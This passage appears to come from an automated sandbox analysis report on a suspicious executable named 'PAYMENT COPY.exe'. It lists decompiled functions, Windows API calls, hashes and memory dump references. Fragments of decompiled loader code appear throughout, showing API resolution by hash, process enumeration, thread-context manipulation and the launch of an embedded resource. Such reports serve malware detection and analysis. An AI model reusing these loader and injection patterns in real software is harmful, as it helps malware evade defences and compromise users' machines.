                                                                    • ExitProcess.KERNEL32(00000000), ref: 72C34597
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.265352593.0000000072C33000.00000040.00020000.sdmp, Offset: 72C30000, based on PE: true
                                                                    • Associated: 00000007.00000002.265268410.0000000072C30000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000007.00000002.265281482.0000000072C31000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000007.00000002.265307193.0000000072C32000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000007.00000002.265398158.0000000072C35000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateFile$AllocExitFirstProcessProcess32ReadSnapshotToolhelp32Virtual
                                                                    • String ID: 2f1c83fc544845c98d04176df1f2088a
                                                                    • API String ID: 1928574196-2566987791
                                                                    • Opcode ID: e5a720b48dfee86a2bce5bda78bc445742454f45de2ea5702a751a62f69fada8
                                                                    • Instruction ID: 0874b8030e9a9c1f9048ef4aac984d123faac7c94505affcd13da4a6efb4405f
                                                                    • Opcode Fuzzy Hash: e5a720b48dfee86a2bce5bda78bc445742454f45de2ea5702a751a62f69fada8
                                                                    • Instruction Fuzzy Hash: 8C914B70D04288EEEF138BE8CC09BDDBFB5AF25714F904459E640BE192D7B60A15CB66
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 72C33034, Relevance: 6.6, APIs: 4, Instructions: 561processthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 72C33391
                                                                    • GetThreadContext.KERNELBASE(?,00010007), ref: 72C333B4
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 72C333D8
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.265352593.0000000072C33000.00000040.00020000.sdmp, Offset: 72C30000, based on PE: true
                                                                    • Associated: 00000007.00000002.265268410.0000000072C30000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000007.00000002.265281482.0000000072C31000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000007.00000002.265307193.0000000072C32000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000007.00000002.265398158.0000000072C35000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Process$ContextCreateMemoryReadThread
                                                                    • String ID:
                                                                    • API String ID: 2411489757-0
                                                                    • Opcode ID: 121b7bab5456a289939b47848a99af8a5c7468950a46016d47dd807709288a24
                                                                    • Instruction ID: 0540104c721aa917ef6b0964e92389c2bdac75896ef9f4e46bc96443c292a7ee
                                                                    • Opcode Fuzzy Hash: 121b7bab5456a289939b47848a99af8a5c7468950a46016d47dd807709288a24
                                                                    • Instruction Fuzzy Hash: 7E323831E40208AEEB22CFA8DC45BECBBB5BF44704F504896E509FB2A1D7705A94DB56
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 72C34239, Relevance: 3.1, APIs: 2, Instructions: 52processCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 71%
                                                                    			E72C34239(void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v544;
				char _v580;
				struct tagPROCESSENTRY32W* _t25;

				_v8 = E72C345A0();
				_v16 = E72C34648(_v8, 0xea31d3b6);
				_v20 = E72C34648(_v8, 0x5c7bf6e9);
				_v24 = E72C34648(_v8, 0x873d1860);
				_v12 = CreateToolhelp32Snapshot(2, 0);
				if(_v12 != 0xffffffff) {
					_v580 = 0x22c;
					_t25 =  &_v580;
					Process32FirstW(_v12, _t25);
					if(_t25 != 0) {
						while(E72C341F5( &_v544) != _a4) {
							_push( &_v580);
							_push(_v12);
							if(_v24() != 0) {
								continue;
							}
							return 0;
						}
						return 1;
					}
					return 0;
				}
				return 0;
			}











                                                                    0x72c34247
                                                                    0x72c34257
                                                                    0x72c34267
                                                                    0x72c34277
                                                                    0x72c34281
                                                                    0x72c34288
                                                                    0x72c3428e
                                                                    0x72c34298
                                                                    0x72c342a2
                                                                    0x72c342a7
                                                                    0x72c342ad
                                                                    0x72c342c9
                                                                    0x72c342ca
                                                                    0x72c342d2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x72c342d4
                                                                    0x00000000
                                                                    0x72c342c0
                                                                    0x00000000
                                                                    0x72c342a9
                                                                    0x00000000

                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 72C3427E
                                                                    • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 72C342A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.265352593.0000000072C33000.00000040.00020000.sdmp, Offset: 72C30000, based on PE: true
                                                                    • Associated: 00000007.00000002.265268410.0000000072C30000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000007.00000002.265281482.0000000072C31000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000007.00000002.265307193.0000000072C32000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000007.00000002.265398158.0000000072C35000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 2353314856-0
                                                                    • Opcode ID: 4fec2c12de2fa19a68e7ad0317d70262ee43ba40948bb73445af5165cff89eff
                                                                    • Instruction ID: a1c8fd499dc84748c409518fe7bd68d9f2353e9a0279cc6b62bff42ed8fb8885
                                                                    • Opcode Fuzzy Hash: 4fec2c12de2fa19a68e7ad0317d70262ee43ba40948bb73445af5165cff89eff
                                                                    • Instruction Fuzzy Hash: 8C112A34D1010DBFDB23EFB4CC48AADBAB9FF25300F9049A5E915FA151E7314A619B52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Analysis Process: PAYMENT COPY.exe PID: 6712 Parent PID: 6612 PAYMENT COPY.exeCOMMON

                                                                    Executed Functions

                                                                    Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}




                                                                    0x00401e22
                                                                    0x00401e28

                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                                                    • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                                                                    • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}








                                                                    0x0040149f
                                                                    0x004014a5
                                                                    0x004014a9
                                                                    0x004014ec
                                                                    0x004014ee
                                                                    0x004014ee
                                                                    0x004014b7
                                                                    0x004014bb
                                                                    0x004014c7
                                                                    0x004014cd
                                                                    0x004014d3
                                                                    0x004014d8
                                                                    0x004014e0
                                                                    0x004014e0
                                                                    0x004014d8
                                                                    0x004014e6
                                                                    0x00000000

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                                                                    • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                                                                    • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                                                                    • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                                                                    • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                                                                      • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                                                                    • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                                                                    • ExitProcess.KERNEL32 ref: 004014EE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                                                                    • String ID: v4.0.30319
                                                                    • API String ID: 2372384083-3152434051
                                                                    • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                                                    • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                                                                    • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                                                    • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0499B6C0, Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 0499B730
                                                                    • GetCurrentThread.KERNEL32 ref: 0499B76D
                                                                    • GetCurrentProcess.KERNEL32 ref: 0499B7AA
                                                                    • GetCurrentThreadId.KERNEL32 ref: 0499B803
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279191017.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0
                                                                    • Opcode ID: a6b65290d105d41529392c311e2412ca2a8e81ee2b4aafc28703251741dd6f70
                                                                    • Instruction ID: fd93b5f7dc5486230017e469caa19694b781bd62141de6c3e4fe8477ccdb1535
                                                                    • Opcode Fuzzy Hash: a6b65290d105d41529392c311e2412ca2a8e81ee2b4aafc28703251741dd6f70
                                                                    • Instruction Fuzzy Hash: F55154B0D003498FEB10CFA9D588BDEBBF0FB48304F248569E019A7790D778A944CB66
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0499B6D0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 0499B730
                                                                    • GetCurrentThread.KERNEL32 ref: 0499B76D
                                                                    • GetCurrentProcess.KERNEL32 ref: 0499B7AA
                                                                    • GetCurrentThreadId.KERNEL32 ref: 0499B803
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279191017.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0
                                                                    • Opcode ID: 566b280d978f6f5926c387a8f5a693c9b5bee53d9ccc7efc55d8006330b04b16
                                                                    • Instruction ID: 5ce23d97744a45bdf458a5317bfb631702f37518a32a9f5c917f2bf2a21e52b1
                                                                    • Opcode Fuzzy Hash: 566b280d978f6f5926c387a8f5a693c9b5bee53d9ccc7efc55d8006330b04b16
                                                                    • Instruction Fuzzy Hash: BA5146B0D003498FDB10CFA9D588BDEBBF5FB48314F248569E019A7790D778A944CBA6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







                                                                    0x004055c5
                                                                    0x004055cf
                                                                    0x004055d3
                                                                    0x004055e4
                                                                    0x004055e8
                                                                    0x004055ed
                                                                    0x004055f3
                                                                    0x004055f8
                                                                    0x004055fd
                                                                    0x00405602
                                                                    0x00405609
                                                                    0x004055d5
                                                                    0x004055d5
                                                                    0x004055d5
                                                                    0x00405614

                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: EnvironmentStrings$Free
                                                                    • String ID:
                                                                    • API String ID: 3328510275-0
                                                                    • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                                                                    • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                                                                    • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                                                                    • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 051C17E0, Relevance: 2.0, APIs: 1, Instructions: 517COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279537294.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0c3b99ef7a7cfa344ee282aa246fc1ab1d02ba872cd387f62eec15f1bb5af54f
                                                                    • Instruction ID: 64978de221e06fbba684773cce5ed8c60d3c633531026086c74e4c64fcb3074c
                                                                    • Opcode Fuzzy Hash: 0c3b99ef7a7cfa344ee282aa246fc1ab1d02ba872cd387f62eec15f1bb5af54f
                                                                    • Instruction Fuzzy Hash: 5922A378E44205CFDB14CB98D488ABEBFB2FFA9310F15819AD46267355C736AC81CB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 049993E8, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0499962E
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279191017.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 234ae28e9dba40c0d1f2bdf63eeedf56fd334d3abe54a647edc15b60539913d4
                                                                    • Instruction ID: bd57ce7e493f8e5f3b55059c3331f9612555be9419f36809d703feb2a4e750a6
                                                                    • Opcode Fuzzy Hash: 234ae28e9dba40c0d1f2bdf63eeedf56fd334d3abe54a647edc15b60539913d4
                                                                    • Instruction Fuzzy Hash: 887102B0A10B058FDB64DF2AD44579AB7F5BF88304F008A2DD48AD7B50EB74F9498B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0499FBEE, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0499FD0A
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279191017.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 9aabb66e517abd0693e99b3ad69a34b6ca56976859d31bcdb34fddffd88a0937
                                                                    • Instruction ID: 4fbf7d839350d9c1474235bf6ca6589a29e8fefaaab795acd374e070408ba350
                                                                    • Opcode Fuzzy Hash: 9aabb66e517abd0693e99b3ad69a34b6ca56976859d31bcdb34fddffd88a0937
                                                                    • Instruction Fuzzy Hash: 7D51B0B1D002499FDF14CFA9D880ADDFBF5BF48314F24812AE419AB214D774A945CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0499FBF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0499FD0A
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279191017.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 1a00d96024d4a6d7d193365612099ddb41220e551b9b5a2ed75c901497d0f8bc
                                                                    • Instruction ID: 7b4571b861e33a7a240317c0c4a0536a4747d7d8a1636db9b7a29e730995574d
                                                                    • Opcode Fuzzy Hash: 1a00d96024d4a6d7d193365612099ddb41220e551b9b5a2ed75c901497d0f8bc
                                                                    • Instruction Fuzzy Hash: 71419EB1D002499FDF14CFA9D884ADEFBF5BF48314F24822AE819AB214D775A945CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 051C45F5, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 051C46B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279537294.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: ba3a6807d9c44b12ae4c0727e2c3276538a23409348def93e58b72531208413d
                                                                    • Instruction ID: 63ad96180a503e030d3f3ad1c74fe8a9575fd674aa19dcdb35d4f36ba788d0a1
                                                                    • Opcode Fuzzy Hash: ba3a6807d9c44b12ae4c0727e2c3276538a23409348def93e58b72531208413d
                                                                    • Instruction Fuzzy Hash: B34102B1C04258CFDB24DFA9C8847CDBBB1BF59304F20805AD409BB255DBB5694ACF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 051C3474, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 051C46B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279537294.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: 83d33008f9de2e705f2253739c2f70bab090e6b8ac7f430f55b4e5c47711336d
                                                                    • Instruction ID: 5a8c2ebc50b80c4add97ffbd088f6ab2bb9b0bc06df511531cea2fd8bbfcab1b
                                                                    • Opcode Fuzzy Hash: 83d33008f9de2e705f2253739c2f70bab090e6b8ac7f430f55b4e5c47711336d
                                                                    • Instruction Fuzzy Hash: 8741FEB1C0465CCBDB24DFA9D884BCEBBB5BF59304F20806AD409BB250DBB56949CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 051C2470, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 051C2531
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279537294.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CallProcWindow
                                                                    • String ID:
                                                                    • API String ID: 2714655100-0
                                                                    • Opcode ID: bd1a7575aea21eade9255c3707475cd9b3d79878b18eabd003a30412bfc7b8b2
                                                                    • Instruction ID: 8cf84bec2c9ae56d667c523ed4d9e15c0451d5fcc9c56ad64939af89a849e0f0
                                                                    • Opcode Fuzzy Hash: bd1a7575aea21eade9255c3707475cd9b3d79878b18eabd003a30412bfc7b8b2
                                                                    • Instruction Fuzzy Hash: 87411AB8A003058FDB14CF99C448AEABBF6FB98314F14C599D559A7321D375A841CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 051CB889, Relevance: 1.6, APIs: 1, Instructions: 85windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 051CB957
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279537294.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateFromIconResource
                                                                    • String ID:
                                                                    • API String ID: 3668623891-0
                                                                    • Opcode ID: 6d4936a3a64abeab4804b85cb3b2feb7d91eb70b91bd14cbf34346151597cbc9
                                                                    • Instruction ID: 12404d627ce175d964112af58f4e4e5fc57a192cc2aed4a3ced644abe2e7ef66
                                                                    • Opcode Fuzzy Hash: 6d4936a3a64abeab4804b85cb3b2feb7d91eb70b91bd14cbf34346151597cbc9
                                                                    • Instruction Fuzzy Hash: 3731BCB29042499FCB01CFA9D805BDEBFF4EF19310F04809AE954EB261C3399954DFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0499BCF8, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0499BD87
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279191017.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 83327cc010fc0b79328b38ad47cd015fd99ac5eaeeb92587a1f85005efb16b50
                                                                    • Instruction ID: 1560344303e393a6efecef97bbfde6585f64564e183120cffae973ec56223b27
                                                                    • Opcode Fuzzy Hash: 83327cc010fc0b79328b38ad47cd015fd99ac5eaeeb92587a1f85005efb16b50
                                                                    • Instruction Fuzzy Hash: A721E0B5D002499FDB10CFA9E485ADEBBF4FB08314F14841AE958A7710D378A945CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0499BD00, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0499BD87
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279191017.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: d9f2e4fc32cc1a27edf4c8bf728024618c506558781c7b9d2eb2cf59060b4d0f
                                                                    • Instruction ID: 0d3b806991a5044b0ecdf4f9233bd67997de3481b21e973f82a7161698309974
                                                                    • Opcode Fuzzy Hash: d9f2e4fc32cc1a27edf4c8bf728024618c506558781c7b9d2eb2cf59060b4d0f
                                                                    • Instruction Fuzzy Hash: 1921C4B5D002499FDB10CFA9D884ADEFBF8FB48314F14851AE918A3710D378A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04997EE9, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 04997F5D
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279191017.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: 457c4642bc3dd375a495e93d274a2b2d377b2c578a0dcd7d2c6de23efd690436
                                                                    • Instruction ID: 06e9465e933ab4036c41a715bcf8afc36757399e68825a97553fd115c151fc6e
                                                                    • Opcode Fuzzy Hash: 457c4642bc3dd375a495e93d274a2b2d377b2c578a0dcd7d2c6de23efd690436
                                                                    • Instruction Fuzzy Hash: CD11CDB1808398DFDB11CFA9D4453EABFF4EB05314F0480AAD494B7642C778AA06CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04998768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,049996A9,00000800,00000000,00000000), ref: 049998BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279191017.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: 671e85bf5f0f023277616634cefb662f69ad69c708e5608a437a40f8e3988dcd
                                                                    • Instruction ID: 2a573b9389eee7653a3c77988edc38cdf2e31c5fd028cb823fee249a1cf0a5ca
                                                                    • Opcode Fuzzy Hash: 671e85bf5f0f023277616634cefb662f69ad69c708e5608a437a40f8e3988dcd
                                                                    • Instruction Fuzzy Hash: 5C11F2B6D002099FDB10CF9AD444ADEFBF8EB48314F14852EE519A7700D375A945CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04999849, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,049996A9,00000800,00000000,00000000), ref: 049998BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279191017.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: 92939b9515387d1cbaa964e051c79726431bf19ef1b3332bb817e6c78ca8549c
                                                                    • Instruction ID: bb4f8d477fbd2ad6f576e5c28c9479f869100d4dd421b54d6094acc72749ab24
                                                                    • Opcode Fuzzy Hash: 92939b9515387d1cbaa964e051c79726431bf19ef1b3332bb817e6c78ca8549c
                                                                    • Instruction Fuzzy Hash: 7311E4B6D002499FDB10CF9AD444ADEFBF4EB88314F14852ED429A7710C375A946CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 051CB8E8, Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 051CB957
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279537294.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateFromIconResource
                                                                    • String ID:
                                                                    • API String ID: 3668623891-0
                                                                    • Opcode ID: 772e744991fadec0578526ddf94d1ed2074cbc6262fc5c8a3297d1d91ecc9d78
                                                                    • Instruction ID: c88d8147d510c462c1559d1247ef83825d28b441e3d2bb7190ace5300c43e5c0
                                                                    • Opcode Fuzzy Hash: 772e744991fadec0578526ddf94d1ed2074cbc6262fc5c8a3297d1d91ecc9d78
                                                                    • Instruction Fuzzy Hash: 041134B18002499FDB10CFAAD845BDEBFF8EB58320F14841AE924A7610C379A954DFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 051C32D8, Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostMessageW.USER32(?,049753E8,00000000,?), ref: 051CE73D
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.279537294.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MessagePost
